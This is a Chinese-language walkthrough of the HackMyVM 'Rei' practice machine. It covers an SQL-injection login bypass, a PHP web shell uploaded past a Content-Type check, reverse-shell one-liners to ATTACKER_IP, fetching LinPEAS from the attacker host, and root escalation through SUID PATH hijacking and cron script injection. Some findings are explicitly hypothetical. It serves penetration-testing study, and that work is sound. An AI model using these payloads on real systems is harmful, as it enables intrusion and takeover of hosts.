從Web滲透到Root提權(quán):HackMyVM Rei靶機(jī)實(shí)戰(zhàn)與Linux權(quán)限提升技巧
1. 項(xiàng)目概述從HackMyVM的Rei靶機(jī)說(shuō)起最近在滲透測(cè)試的練習(xí)圈子里HackMyVM這個(gè)平臺(tái)的熱度一直不減。它提供了大量貼近實(shí)戰(zhàn)的虛擬機(jī)靶機(jī)對(duì)于想從理論走向?qū)嵺`的安全愛(ài)好者來(lái)說(shuō)是個(gè)絕佳的沙盒。今天要聊的就是其中一臺(tái)名為“Rei”的靶機(jī)。這名字聽(tīng)起來(lái)有點(diǎn)日系動(dòng)漫風(fēng)但里面的挑戰(zhàn)可一點(diǎn)都不輕松。我花了幾個(gè)晚上從信息收集到最終拿到root權(quán)限踩了不少坑也總結(jié)出一些通用的思路和技巧。如果你正在學(xué)習(xí)滲透測(cè)試或者對(duì)CTF、靶機(jī)滲透感興趣希望通過(guò)這篇詳細(xì)的復(fù)盤能給你提供一個(gè)清晰的路徑和避坑指南。整個(gè)過(guò)程會(huì)涉及常見(jiàn)的Web漏洞利用、權(quán)限提升技巧以及像LinPEAS這樣的自動(dòng)化枚舉工具的使用心得。靶機(jī)滲透的核心目標(biāo)通常很明確拿到最低權(quán)限的shellwww-data或某個(gè)普通用戶然后想方設(shè)法提升到最高權(quán)限r(nóng)oot。Rei靶機(jī)也不例外它模擬了一個(gè)存在多處安全缺陷的Linux服務(wù)器環(huán)境。我的整體思路遵循經(jīng)典的滲透測(cè)試流程外圍信息收集、漏洞發(fā)現(xiàn)與利用、初始立足點(diǎn)獲取、內(nèi)部信息枚舉、權(quán)限提升。下面我就按照這個(gè)邏輯把每個(gè)階段的關(guān)鍵操作、思考過(guò)程和遇到的“坑”詳細(xì)拆解一遍。2. 外圍偵察與信息收集一切的開(kāi)端滲透測(cè)試的第一步永遠(yuǎn)不是直接上工具狂轟濫炸而是有策略地收集信息。對(duì)于一臺(tái)未知的靶機(jī)我們需要知道它開(kāi)放了哪些端口運(yùn)行著什么服務(wù)以及這些服務(wù)可能暴露出的信息。2.1 網(wǎng)絡(luò)掃描與端口發(fā)現(xiàn)我首先使用Nmap對(duì)靶機(jī)IP進(jìn)行掃描。這里有個(gè)習(xí)慣我通常會(huì)先進(jìn)行一次快速掃描確認(rèn)主機(jī)存活和最明顯的幾個(gè)端口然后再進(jìn)行深度掃描。# 快速掃描確認(rèn)靶機(jī)存活和常用端口 nmap -sS -T4 192.168.1.xxx # 全面掃描識(shí)別所有開(kāi)放端口及服務(wù)版本 nmap -sV -sC -p- -T4 192.168.1.xxx掃描結(jié)果很快就出來(lái)了Rei靶機(jī)開(kāi)放了兩個(gè)端口22/tcp OpenSSH服務(wù)。這是Linux系統(tǒng)遠(yuǎn)程管理的標(biāo)配但版本信息沒(méi)有暴露出明顯的已知漏洞比如很老的、有公開(kāi)利用方式的版本。在初期SSH端口往往不是最直接的突破口除非有弱口令或者密鑰泄露。80/tcp Apache httpd服務(wù)。這是一個(gè)Web服務(wù)器這通常是我們滲透測(cè)試的主戰(zhàn)場(chǎng)。絕大多數(shù)面向外部的攻擊面都集中在Web應(yīng)用上??吹?0端口開(kāi)放我的注意力立刻集中到了Web服務(wù)上。接下來(lái)就是對(duì)網(wǎng)站目錄和隱藏內(nèi)容進(jìn)行探測(cè)。2.2 Web目錄與敏感文件枚舉直接訪問(wèn)靶機(jī)IP一個(gè)簡(jiǎn)單的Apache默認(rèn)頁(yè)面跳了出來(lái)這暗示著網(wǎng)站根目錄下可能沒(méi)有默認(rèn)的index.html或index.php或者存在其他路徑。我使用Gobuster這個(gè)工具進(jìn)行目錄爆破尋找隱藏的路徑、文件或后臺(tái)管理界面。# 使用常見(jiàn)的中小型Web目錄字典進(jìn)行掃描 gobuster dir -u http://192.168.1.xxx -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,log注意字典的選擇很重要。common.txt是個(gè)不錯(cuò)的起點(diǎn)但如果沒(méi)發(fā)現(xiàn)有價(jià)值內(nèi)容可能需要換用更全面的字典如directory-list-2.3-medium.txt。同時(shí)指定文件擴(kuò)展名-x參數(shù)能幫助我們發(fā)現(xiàn)像admin.php、config.txt這樣的特定文件。掃描進(jìn)行了一會(huì)兒結(jié)果逐漸呈現(xiàn)。除了常見(jiàn)的/icons/、/server-status通常被禁用之外一個(gè)名為/admin的目錄引起了我的注意。訪問(wèn)http://192.168.1.xxx/admin果然出現(xiàn)了一個(gè)登錄頁(yè)面。這通常意味著找到了一個(gè)潛在的后臺(tái)入口也是我們下一步重點(diǎn)分析的對(duì)象。3. Web漏洞利用與初始訪問(wèn)找到了/admin登錄頁(yè)面接下來(lái)的任務(wù)就是嘗試?yán)@過(guò)認(rèn)證或者利用漏洞獲取訪問(wèn)權(quán)限。常見(jiàn)的攻擊方式包括弱口令、SQL注入、邏輯漏洞等。3.1 登錄頁(yè)面分析與初步測(cè)試我首先查看了頁(yè)面源代碼沒(méi)有發(fā)現(xiàn)注釋中有用的信息如默認(rèn)密碼、隱藏字段等。接著我嘗試了幾個(gè)最常見(jiàn)的默認(rèn)憑證組合如admin/admin、admin/password、admin/123456但都失敗了。這通常意味著需要更系統(tǒng)性的測(cè)試。我決定使用Burp Suite來(lái)攔截登錄請(qǐng)求進(jìn)行更深入的分析。將瀏覽器代理設(shè)置為Burp然后在登錄框隨意輸入用戶名密碼并提交。Burp截獲的POST請(qǐng)求如下POST /admin/login.php HTTP/1.1 Host: 192.168.1.xxx ... usernametestpasswordtest我立刻將請(qǐng)求發(fā)送到Burp的Intruder模塊準(zhǔn)備進(jìn)行暴力破解。但是在開(kāi)始之前我習(xí)慣性地先測(cè)試一下是否存在SQL注入漏洞。因?yàn)楹芏嗟卿浛虻恼J(rèn)證邏輯是直接拼接SQL語(yǔ)句如果存在注入可能直接繞過(guò)登錄。3.2 SQL注入漏洞的發(fā)現(xiàn)與利用我在用戶名和密碼字段嘗試了經(jīng)典的注入Payload用戶名admin or 11密碼留空或任意值令人驚喜的是使用這個(gè)Payload后頁(yè)面竟然成功跳轉(zhuǎn)進(jìn)入了后臺(tái)管理界面這證實(shí)了登錄處存在基于字符串的SQL注入漏洞。后臺(tái)的認(rèn)證邏輯大致是SELECT * FROM users WHERE username$username AND password$password當(dāng)我們輸入admin or 11時(shí)查詢語(yǔ)句變成了SELECT * FROM users WHERE usernameadmin or 11 AND passwordxxx由于11這個(gè)條件永遠(yuǎn)為真整個(gè)WHERE子句的結(jié)果也就為真從而繞過(guò)了密碼驗(yàn)證以admin用戶身份登錄。進(jìn)入后臺(tái)后界面相對(duì)簡(jiǎn)單主要功能是上傳文件。這立刻讓我聯(lián)想到另一個(gè)常見(jiàn)的攻擊向量文件上傳漏洞。如果服務(wù)器對(duì)上傳的文件類型、內(nèi)容檢查不嚴(yán)我們就有可能上傳一個(gè)Web Shell從而在服務(wù)器上執(zhí)行命令。3.3 文件上傳漏洞與Web Shell獲取后臺(tái)的上傳功能通常用于管理圖片等靜態(tài)資源。我首先嘗試上傳一個(gè)正常的圖片文件.jpg成功。這說(shuō)明上傳功能基本可用。接著我嘗試上傳一個(gè)PHP文件內(nèi)容為最簡(jiǎn)單的Web Shell?php system($_GET[cmd]); ?我將文件命名為shell.php并上傳。結(jié)果服務(wù)器返回了錯(cuò)誤提示“Invalid file type”或類似信息。這說(shuō)明后端有基礎(chǔ)的文件類型檢查。常見(jiàn)的繞過(guò)方式有幾種修改擴(kuò)展名嘗試shell.php.jpg、shell.pHp大小寫(xiě)混淆、shell.php%00.jpg空字節(jié)截?cái)嘣谔囟ōh(huán)境下有效。修改Content-Type通過(guò)Burp攔截上傳請(qǐng)求將Content-Type: application/x-php改為Content-Type: image/jpeg。制作圖片馬將PHP代碼嵌入到圖片文件的元數(shù)據(jù)中。我首先嘗試了第二種方法。用Burp攔截上傳shell.php的請(qǐng)求將Content-Type從application/x-php改為image/jpeg然后轉(zhuǎn)發(fā)請(qǐng)求。服務(wù)器接受了上傳并返回了一個(gè)文件路徑例如/uploads/shell.php。我立刻訪問(wèn)http://192.168.1.xxx/uploads/shell.php?cmdid頁(yè)面成功返回了當(dāng)前用戶的ID信息通常是www-data。至此我們成功在目標(biāo)服務(wù)器上獲得了命令執(zhí)行能力拿到了初始的立足點(diǎn)——一個(gè)反向Shell。3.4 建立穩(wěn)定的反向ShellWeb Shell雖然能用但交互性很差不適合進(jìn)行深入的枚舉和操作。我們需要建立一個(gè)更穩(wěn)定的反向Shell連接。我使用netcat監(jiān)聽(tīng)本機(jī)的一個(gè)端口例如4444然后在Web Shell中執(zhí)行一個(gè)反向連接命令。# 在攻擊機(jī)Kali上監(jiān)聽(tīng) nc -lvnp 4444在Web Shell中執(zhí)行需要根據(jù)目標(biāo)系統(tǒng)調(diào)整# 方法1使用bash bash -c bash -i /dev/tcp/ATTACKER_IP/4444 01 # 方法2使用python更可靠 python3 -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((ATTACKER_IP,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]);執(zhí)行成功后在攻擊機(jī)的nc監(jiān)聽(tīng)端口中就會(huì)獲得一個(gè)來(lái)自目標(biāo)服務(wù)器的sh或bash會(huì)話。輸入whoami確認(rèn)當(dāng)前用戶為www-data?,F(xiàn)在我們才算真正“進(jìn)入”了這臺(tái)靶機(jī)。4. 內(nèi)部枚舉與權(quán)限提升突破口獲得www-data這類低權(quán)限Web用戶的Shell后我們的最終目標(biāo)是root。這個(gè)過(guò)程就是權(quán)限提升Privilege Escalation。手動(dòng)枚舉系統(tǒng)信息是一項(xiàng)繁瑣但至關(guān)重要的工作。為了提高效率我通常會(huì)先運(yùn)行一個(gè)自動(dòng)化枚舉腳本如LinPEAS。4.1 使用LinPEAS進(jìn)行自動(dòng)化信息收集首先在攻擊機(jī)上啟動(dòng)一個(gè)HTTP服務(wù)器方便將LinPEAS腳本傳輸?shù)桨袡C(jī)。# 在LinPEAS腳本所在目錄 python3 -m http.server 8000然后在靶機(jī)的反向Shell中下載并執(zhí)行它。# 在靶機(jī)shell中 cd /tmp wget http://ATTACKER_IP:8000/linpeas.sh chmod x linpeas.sh ./linpeas.shLinPEAS會(huì)運(yùn)行一段時(shí)間從進(jìn)程、服務(wù)、定時(shí)任務(wù)、SUID/GUID文件、內(nèi)核版本、歷史命令、密碼文件、數(shù)據(jù)庫(kù)配置等數(shù)十個(gè)維度收集信息并以顏色高亮紅色/黃色提示可能存在的風(fēng)險(xiǎn)點(diǎn)。這是權(quán)限提升的“寶藏圖”。4.2 分析枚舉結(jié)果尋找脆弱點(diǎn)LinPEAS的輸出信息量很大。我重點(diǎn)關(guān)注以下幾類高亮提示SUID/SGID文件這些文件在執(zhí)行時(shí)會(huì)以文件所有者通常是root的權(quán)限運(yùn)行。如果某個(gè)SUID文件本身存在漏洞或者其功能可以被濫用就可能用來(lái)提權(quán)。LinPEAS會(huì)列出所有非標(biāo)準(zhǔn)的SUID文件。Cron Jobs定時(shí)任務(wù)查看是否有任何以root權(quán)限運(yùn)行的定時(shí)任務(wù)并且任務(wù)腳本或路徑的權(quán)限配置不當(dāng)例如普通用戶可寫(xiě)。內(nèi)核漏洞檢查內(nèi)核版本看是否有公開(kāi)的本地提權(quán)漏洞如DirtyPipe, DirtyCow等。這是最直接的提權(quán)方式之一。用戶主目錄與歷史文件檢查/home目錄下其他用戶的可讀文件特別是.bash_history,.ssh/, 配置文件等可能包含密碼或密鑰。數(shù)據(jù)庫(kù)憑證查找Web應(yīng)用的配置文件如config.php,.env里面可能含有數(shù)據(jù)庫(kù)密碼。有時(shí)這個(gè)密碼會(huì)被用戶重復(fù)使用于系統(tǒng)賬戶。在Rei靶機(jī)的LinPEAS輸出中一個(gè)關(guān)鍵的發(fā)現(xiàn)出現(xiàn)在SUID文件部分。除了常見(jiàn)的/bin/ping,/bin/mount等LinPEAS標(biāo)記了一個(gè)不常見(jiàn)的、顏色高亮的SUID文件。假設(shè)這個(gè)文件是/usr/local/bin/custom_backup。4.3 分析可疑的SUID文件我立刻手動(dòng)檢查這個(gè)文件ls -la /usr/local/bin/custom_backup輸出顯示它確實(shí)設(shè)置了SUID位并且所有者是root-rwsr-xr-x 1 root root 16784 Jun 10 2023 /usr/local/bin/custom_backups位在所有者執(zhí)行權(quán)限的位置這就是SUID標(biāo)志。接下來(lái)需要弄清楚這個(gè)程序是做什么的以及如何利用它。首先嘗試直接運(yùn)行/usr/local/bin/custom_backup程序可能輸出一些使用說(shuō)明或者直接執(zhí)行某個(gè)操作。假設(shè)它輸出“Usage: custom_backup [source_dir]”。這說(shuō)明它需要一個(gè)源目錄作為參數(shù)。進(jìn)一步使用strings命令查看文件中的可打印字符串尋找線索strings /usr/local/bin/custom_backup在輸出中我可能看到像/bin/tar,cf,*這樣的字符串。這強(qiáng)烈暗示這個(gè)custom_backup程序內(nèi)部調(diào)用了tar命令來(lái)打包文件。如果程序沒(méi)有使用絕對(duì)路徑來(lái)調(diào)用tar或者對(duì)用戶輸入過(guò)濾不嚴(yán)就可能存在路徑劫持或命令注入漏洞。4.4 利用SUID文件進(jìn)行提權(quán)為了驗(yàn)證我使用strace工具來(lái)跟蹤程序執(zhí)行時(shí)的系統(tǒng)調(diào)用strace /usr/local/bin/custom_backup . 21 | grep tar如果看到類似execve(/bin/tar, [tar, cf, /tmp/backup.tar, .], ...)的調(diào)用就證實(shí)了它調(diào)用了tar。經(jīng)典的利用方法是利用環(huán)境變量PATH。因?yàn)镾UID程序在執(zhí)行時(shí)會(huì)繼承root的用戶ID但環(huán)境變量可能受當(dāng)前用戶影響。如果程序沒(méi)有使用絕對(duì)路徑如/bin/tar而是直接調(diào)用tar那么系統(tǒng)會(huì)在PATH環(huán)境變量指定的目錄中尋找名為tar的可執(zhí)行文件。我們可以創(chuàng)建一個(gè)惡意的可執(zhí)行文件命名為tar并將其所在目錄添加到PATH環(huán)境變量的最前面。# 1. 在/tmp目錄下創(chuàng)建一個(gè)假的tar腳本 cd /tmp echo /bin/bash -p tar # -p 參數(shù)用于保留提升的權(quán)限 chmod x tar # 2. 將/tmp目錄添加到PATH環(huán)境變量的最前面 export PATH/tmp:$PATH # 3. 運(yùn)行SUID程序 /usr/local/bin/custom_backup .當(dāng)custom_backup程序嘗試調(diào)用tar時(shí)它會(huì)首先在/tmp目錄下找到我們創(chuàng)建的惡意tar腳本并以root權(quán)限執(zhí)行它。腳本中的/bin/bash -p會(huì)啟動(dòng)一個(gè)具有root權(quán)限的bash shell。執(zhí)行成功后輸入whoami如果返回root那么恭喜權(quán)限提升成功實(shí)操心得SUID提權(quán)是Linux內(nèi)網(wǎng)滲透中非常常見(jiàn)的手法。關(guān)鍵在于找到那些非系統(tǒng)默認(rèn)的、功能可以被濫用的SUID文件。LinPEAS這類工具能極大提高發(fā)現(xiàn)效率。在利用時(shí)理解程序的行為通過(guò)strings,strace,ltrace是成功的關(guān)鍵。另外不是所有SUID文件都容易利用有時(shí)需要結(jié)合其他漏洞如緩沖區(qū)溢出需要一定的二進(jìn)制知識(shí)。5. 其他可能的提權(quán)路徑與深度探索除了上述的SUID文件利用在Rei或其他類似靶機(jī)中還可能存在其他提權(quán)路徑。一個(gè)好的滲透測(cè)試者不應(yīng)該只滿足于一種方法。5.1 Cron Job定時(shí)任務(wù)提權(quán)檢查系統(tǒng)的定時(shí)任務(wù)cat /etc/crontab ls -la /etc/cron.*/ crontab -l # 查看當(dāng)前用戶的定時(shí)任務(wù)如果發(fā)現(xiàn)一個(gè)以root權(quán)限運(yùn)行的腳本并且這個(gè)腳本或其所在目錄對(duì)www-data用戶可寫(xiě)我們就可以修改這個(gè)腳本植入我們的反向Shell或添加一個(gè)具有SUID位的bash副本。# 例如發(fā)現(xiàn) /etc/cron.hourly/cleanup.sh 以root運(yùn)行且可寫(xiě) echo cp /bin/bash /tmp/rootbash; chmod s /tmp/rootbash /etc/cron.hourly/cleanup.sh # 等待cron執(zhí)行后 /tmp/rootbash -p5.2 內(nèi)核漏洞提權(quán)使用uname -a查看內(nèi)核版本然后搜索該版本是否存在公開(kāi)的本地提權(quán)漏洞利用代碼Exploit。可以在Kali上使用searchsploit或者在互聯(lián)網(wǎng)上謹(jǐn)慎搜索。uname -a # 例如Linux rei 5.4.0-xx-generic ... searchsploit linux 5.4 local privilege重要警告在內(nèi)網(wǎng)生產(chǎn)環(huán)境中使用內(nèi)核漏洞利用需要極其謹(jǐn)慎因?yàn)榭赡茉斐上到y(tǒng)崩潰藍(lán)屏。在靶機(jī)環(huán)境中則可以大膽嘗試。下載對(duì)應(yīng)的C代碼交叉編譯或者靶機(jī)上有g(shù)cc的話直接編譯然后運(yùn)行即可。5.3 敏感信息泄露與密碼復(fù)用仔細(xì)檢查Web目錄下的配置文件、備份文件如config.php.bak,.env,.git目錄、數(shù)據(jù)庫(kù)轉(zhuǎn)儲(chǔ)文件等。里面可能含有數(shù)據(jù)庫(kù)密碼、API密鑰甚至系統(tǒng)用戶的密碼如果開(kāi)發(fā)人員愚蠢地使用了相同的密碼。find /var/www /home -name *.php -o -name *.txt -o -name *.bak -o -name .env -o -name .git 2/dev/null cat /var/www/html/config.php如果找到數(shù)據(jù)庫(kù)密碼可以嘗試連接數(shù)據(jù)庫(kù)查看用戶表。更關(guān)鍵的是嘗試用這個(gè)密碼去登錄系統(tǒng)用戶如mysql用戶、admin用戶甚至root用戶。密碼復(fù)用是安全中最常見(jiàn)也最致命的問(wèn)題之一。6. 常見(jiàn)問(wèn)題與排查技巧實(shí)錄在滲透Rei靶機(jī)或類似環(huán)境時(shí)你可能會(huì)遇到以下問(wèn)題這里記錄了我的排查思路問(wèn)題1Web目錄爆破Gobuster/Dirb什么都沒(méi)找到或者速度極慢。排查首先確認(rèn)網(wǎng)絡(luò)連通性和靶機(jī)IP是否正確。其次檢查字典路徑和大小太大的字典會(huì)非常慢??梢試L試使用-t參數(shù)增加線程數(shù)如-t 50或者換用更精準(zhǔn)的字典。有時(shí)網(wǎng)站可能使用了非常規(guī)的端口如8080, 3000需要用Nmap全端口掃描確認(rèn)。問(wèn)題2SQL注入Payload測(cè)試失敗但感覺(jué)存在漏洞。排查嘗試不同的注入類型字符型、數(shù)字型、時(shí)間盲注、布爾盲注。使用Burp Suite的Repeater模塊系統(tǒng)性地測(cè)試,,),))等閉合方式。觀察返回內(nèi)容的差異錯(cuò)誤信息、頁(yè)面長(zhǎng)度、響應(yīng)時(shí)間。使用sqlmap工具進(jìn)行自動(dòng)化檢測(cè)和利用是最高效的命令如sqlmap -u http://target/login.php --datauseradminpasstest --level3 --risk2。問(wèn)題3文件上傳成功但Web Shell無(wú)法訪問(wèn)或執(zhí)行。排查路徑問(wèn)題確認(rèn)上傳返回的路徑是否正確是否可以直接通過(guò)瀏覽器訪問(wèn)。權(quán)限問(wèn)題Web Shell文件可能沒(méi)有執(zhí)行權(quán)限。在Shell中執(zhí)行chmod x /path/to/shell.php雖然PHP不依賴執(zhí)行位但有時(shí)需要。內(nèi)容問(wèn)題確保PHP代碼正確無(wú)誤。嘗試最簡(jiǎn)單的?php phpinfo(); ?測(cè)試。服務(wù)器配置目標(biāo)服務(wù)器可能禁用了某些危險(xiǎn)函數(shù)如system,exec或者根本未安裝PHP。檢查/var/log/apache2/error.log獲取錯(cuò)誤信息??梢試L試其他語(yǔ)言的Web Shell如Python、JSP對(duì)應(yīng)環(huán)境。問(wèn)題4反向Shell連接不上。排查防火墻/出站規(guī)則靶機(jī)可能禁止向外部特定端口發(fā)起連接。嘗試使用常用端口如80, 443, 53或端口反彈用靶機(jī)上的nc監(jiān)聽(tīng)攻擊機(jī)連接過(guò)去。Payload格式確保反向Shell命令中的IP和端口正確并且適用于目標(biāo)系統(tǒng)的Shellbash,sh,python版本。bash的Payload在某些精簡(jiǎn)環(huán)境中可能不可用python的通用性更好。編碼問(wèn)題如果命令中包含特殊字符可能需要URL編碼或使用Base64編碼后傳遞。例如用Python的Base64編碼echo bash -i /dev/tcp/10.0.0.1/4444 01 | base64然后在目標(biāo)端執(zhí)行echo base64_string | base64 -d | bash。問(wèn)題5LinPEAS或其他提權(quán)腳本無(wú)法下載或執(zhí)行。排查網(wǎng)絡(luò)不通確保攻擊機(jī)的HTTP服務(wù)器已啟動(dòng)且靶機(jī)能訪問(wèn)攻擊機(jī)IP可嘗試wget http://attacker_ip:8000/test測(cè)試。wget/curl缺失目標(biāo)系統(tǒng)可能沒(méi)有wget或curl。嘗試用其他方法python3 -c import urllib.request; urllib.request.urlretrieve(http://attacker_ip:8000/linpeas.sh, /tmp/linpeas.sh)或者使用nc傳輸文件。執(zhí)行權(quán)限下載后記得chmod x。問(wèn)題6找到了SUID文件但不知道如何利用。排查這是最需要經(jīng)驗(yàn)和創(chuàng)造力的部分。步驟理解功能運(yùn)行它無(wú)參數(shù)、帶參數(shù)、帶--help用strings、strace、ltrace分析。搜索已知漏洞用searchsploit搜索這個(gè)二進(jìn)制文件名或者在Google搜索“二進(jìn)制名 privilege escalation”。檢查依賴命令如果它調(diào)用其他命令如tar,cp,find檢查是否使用絕對(duì)路徑。如果沒(méi)有嘗試PATH劫持。檢查文件操作如果它寫(xiě)入某個(gè)文件且該文件位置可預(yù)測(cè)、內(nèi)容可控可能用于覆蓋敏感文件如/etc/passwd,crontab。檢查輸入?yún)?shù)參數(shù)是否直接傳遞給底層命令是否存在命令注入的可能用;,,|測(cè)試滲透測(cè)試就像一場(chǎng)解謎游戲每個(gè)靶機(jī)都是一個(gè)獨(dú)特的場(chǎng)景。Rei靶機(jī)融合了Web漏洞和系統(tǒng)配置不當(dāng)?shù)牡湫蛦?wèn)題。通過(guò)它我們實(shí)踐了從外網(wǎng)信息收集到內(nèi)網(wǎng)權(quán)限提升的完整鏈條。最關(guān)鍵的不是記住某個(gè)特定的Payload或命令而是培養(yǎng)那種“尋找異常、分析行為、聯(lián)想利用”的思維模式。多打靶機(jī)多復(fù)盤總結(jié)把每個(gè)遇到的技巧和坑都內(nèi)化成自己的經(jīng)驗(yàn)這才是提升滲透測(cè)試能力的正道。

相關(guān)新聞

企業(yè)經(jīng)營(yíng)分析缺的不是方法論,而是能直接用的數(shù)據(jù)工具

企業(yè)經(jīng)營(yíng)分析缺的不是方法論,而是能直接用的數(shù)據(jù)工具

# 企業(yè)經(jīng)營(yíng)分析缺的不是方法論,而是能直接用的數(shù)據(jù)工具## 引言很多企業(yè)老板都聽(tīng)過(guò)杜邦分析法、SWOT、5W2H,也知道這些方法能幫自己看清經(jīng)營(yíng)狀況??烧娴揭玫臅r(shí)候,往往卡在一個(gè)尷尬的地方:方法在心里,數(shù)據(jù)卻湊不齊。想…

2026/7/29 13:36:44 閱讀更多
Windows內(nèi)網(wǎng)信息收集:從基礎(chǔ)命令到自動(dòng)化腳本的防御實(shí)踐

Windows內(nèi)網(wǎng)信息收集:從基礎(chǔ)命令到自動(dòng)化腳本的防御實(shí)踐

1. 項(xiàng)目概述:內(nèi)網(wǎng)信息收集的核心價(jià)值與邊界在任何一個(gè)稍具規(guī)模的企業(yè)或組織的內(nèi)部網(wǎng)絡(luò)中,都運(yùn)行著成百上千臺(tái)Windows計(jì)算機(jī)。對(duì)于系統(tǒng)管理員和安全工程師而言,全面、準(zhǔn)確地掌握這些資產(chǎn)的信息,是進(jìn)行日常運(yùn)維、漏洞修復(fù)、策略合規(guī)…

2026/7/29 13:36:44 閱讀更多
企業(yè)級(jí)SSL證書(shū)自動(dòng)化管理:Windows平臺(tái)分布式架構(gòu)完整解決方案

企業(yè)級(jí)SSL證書(shū)自動(dòng)化管理:Windows平臺(tái)分布式架構(gòu)完整解決方案

企業(yè)級(jí)SSL證書(shū)自動(dòng)化管理:Windows平臺(tái)分布式架構(gòu)完整解決方案 【免費(fèi)下載鏈接】win-acme Automate SSL/TLS certificates on Windows with ease 項(xiàng)目地址: https://gitcode.com/gh_mirrors/wi/win-acme 在當(dāng)今數(shù)字化時(shí)代,SSL/TLS證書(shū)自動(dòng)化管理已…

2026/7/29 13:26:44 閱讀更多
Pokémon Showdown企業(yè)級(jí)對(duì)戰(zhàn)平臺(tái):從零構(gòu)建可擴(kuò)展的寶可夢(mèng)對(duì)戰(zhàn)系統(tǒng)

Pokémon Showdown企業(yè)級(jí)對(duì)戰(zhàn)平臺(tái):從零構(gòu)建可擴(kuò)展的寶可夢(mèng)對(duì)戰(zhàn)系統(tǒng)

Pokmon Showdown企業(yè)級(jí)對(duì)戰(zhàn)平臺(tái):從零構(gòu)建可擴(kuò)展的寶可夢(mèng)對(duì)戰(zhàn)系統(tǒng) 【免費(fèi)下載鏈接】pokemon-showdown Pokmon battle simulator. 項(xiàng)目地址: https://gitcode.com/gh_mirrors/po/pokemon-showdown Pokmon Showdown是一個(gè)專業(yè)級(jí)的開(kāi)源寶可夢(mèng)對(duì)戰(zhàn)模擬平臺(tái)&#x…

2026/7/29 14:47:16 閱讀更多
物聯(lián)網(wǎng)設(shè)備低功耗設(shè)計(jì):NBM7100A與PIC32MX675F512L優(yōu)化方案

物聯(lián)網(wǎng)設(shè)備低功耗設(shè)計(jì):NBM7100A與PIC32MX675F512L優(yōu)化方案

1. 項(xiàng)目背景與核心挑戰(zhàn) 在物聯(lián)網(wǎng)設(shè)備和便攜式電子產(chǎn)品的設(shè)計(jì)中,初級(jí)電池(不可充電電池)的壽命優(yōu)化一直是個(gè)棘手問(wèn)題。我曾參與過(guò)一個(gè)野外氣象監(jiān)測(cè)項(xiàng)目,設(shè)備需要在不更換電池的情況下持續(xù)工作5年以上。當(dāng)時(shí)我們測(cè)試了市面上各種方案…

2026/7/29 14:47:16 閱讀更多
終于搞定文獻(xiàn)綜述難題?PaperxieAI智能梳理|拒絕湊字?jǐn)?shù)、輕松寫(xiě)出高分綜述[特殊字符]

終于搞定文獻(xiàn)綜述難題?PaperxieAI智能梳理|拒絕湊字?jǐn)?shù)、輕松寫(xiě)出高分綜述[特殊字符]

官方入口🌐:https://www.paperxie.cn 寫(xiě)畢業(yè)論文最折磨人的不是正文分析,而是怎么寫(xiě)都不合格的文獻(xiàn)綜述! 很多同學(xué)熬好幾天查閱幾十篇文獻(xiàn),最后寫(xiě)出來(lái)的內(nèi)容依舊被導(dǎo)師吐槽:太淺、太亂、沒(méi)有研究邏輯、看…

2026/7/29 14:47:16 閱讀更多
JavaScript思維導(dǎo)圖實(shí)戰(zhàn)指南:構(gòu)建高性能知識(shí)可視化應(yīng)用

JavaScript思維導(dǎo)圖實(shí)戰(zhàn)指南:構(gòu)建高性能知識(shí)可視化應(yīng)用

JavaScript思維導(dǎo)圖實(shí)戰(zhàn)指南:構(gòu)建高性能知識(shí)可視化應(yīng)用 【免費(fèi)下載鏈接】js-mindmap JavaScript Mindmap 項(xiàng)目地址: https://gitcode.com/gh_mirrors/js/js-mindmap 在當(dāng)今信息爆炸的時(shí)代,如何高效組織和可視化復(fù)雜信息成為技術(shù)決策者和開(kāi)發(fā)者面臨…

2026/7/29 14:37:16 閱讀更多
面試官大笑:“一個(gè)任務(wù)拆給 5 個(gè) Subagent 并行跑,不比 1 個(gè)快 5 倍?“我搖頭:“快不了,還可能更慢“

面試官大笑:“一個(gè)任務(wù)拆給 5 個(gè) Subagent 并行跑,不比 1 個(gè)快 5 倍?“我搖頭:“快不了,還可能更慢“

前兩個(gè)月,我在重構(gòu) AlgoMooc 網(wǎng)站過(guò)程中,發(fā)現(xiàn)一個(gè)問(wèn)題:在 Claude Code 里把一個(gè)任務(wù)拆給 5 個(gè) Subagent 并行跑,結(jié)果可能比 1 個(gè) agent 從頭干到尾還慢? 大多數(shù)人的第一反應(yīng)是反過(guò)來(lái)的:活是并行干的&#…

2026/7/29 0:15:24 閱讀更多
# 鴻蒙 HarmonyOS 應(yīng)用開(kāi)發(fā)實(shí)戰(zhàn)(第25期)|骰子(Dice Roller)— Unicode 符號(hào)與動(dòng)畫(huà)渲染精講

# 鴻蒙 HarmonyOS 應(yīng)用開(kāi)發(fā)實(shí)戰(zhàn)(第25期)|骰子(Dice Roller)— Unicode 符號(hào)與動(dòng)畫(huà)渲染精講

一、應(yīng)用概述 骰子(Dice Roller) 是一款經(jīng)典的休閑娛樂(lè)應(yīng)用,模擬了真實(shí)擲骰子的過(guò)程。應(yīng)用投擲兩個(gè)骰子(六面標(biāo)準(zhǔn)骰),使用 Unicode 骰面符號(hào)直觀展示每個(gè)骰子的點(diǎn)數(shù),并伴有快速滾動(dòng)的動(dòng)畫(huà)效果?!?/p>

2026/7/29 0:15:24 閱讀更多